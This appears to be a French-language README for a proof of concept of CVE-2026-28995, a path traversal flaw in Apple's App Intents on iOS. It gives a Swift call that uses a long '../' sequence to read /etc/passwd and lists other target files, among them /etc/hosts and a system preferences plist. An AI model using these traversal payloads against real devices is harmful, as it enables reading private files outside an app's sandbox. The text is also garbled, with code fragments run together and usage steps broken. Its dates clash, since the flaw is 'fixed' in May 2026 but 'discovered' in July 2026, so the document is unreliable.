
# CVE-2026-28995 Preuve de concept pour CVE-2026-28995 — Vulnérabilité de traversée de chemin dans App Intents sur iOS 26.4.2 et versions antérieures.
Preuve de concept pour CVE-2026-28995 — Vulnérabilité de traversée de chemin dans App Intents sur iOS 26.4.2 et versions antérieures.
Cette vulnérabilité permet à une application malveillante de lire n'importe quel fichier en dehors de son bac à sable via App Intents. La cause racine est une validation insuffisante des chemins dans le framework App Intents d'Apple.
Versions affectées : iOS 26.4.2 et versions antérieures
Corrigé dans : iOS 26.5 (11 mai 2026)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
Chemin Lit
../../../../../../../../../../../../../etc/passwd Mots de passe utilisateur ../../../../../../../../../../../../../etc/hosts Fichier hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Préférences système
Si le chemin pointe vers un répertoire, la fonction retourne :
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
CVE-2026-28995.swift au projet.readCve(path:) avec le chemin cible.Découvert : 1er juillet 2026
Corrigé dans : iOS 26.5 (11 mai 2026)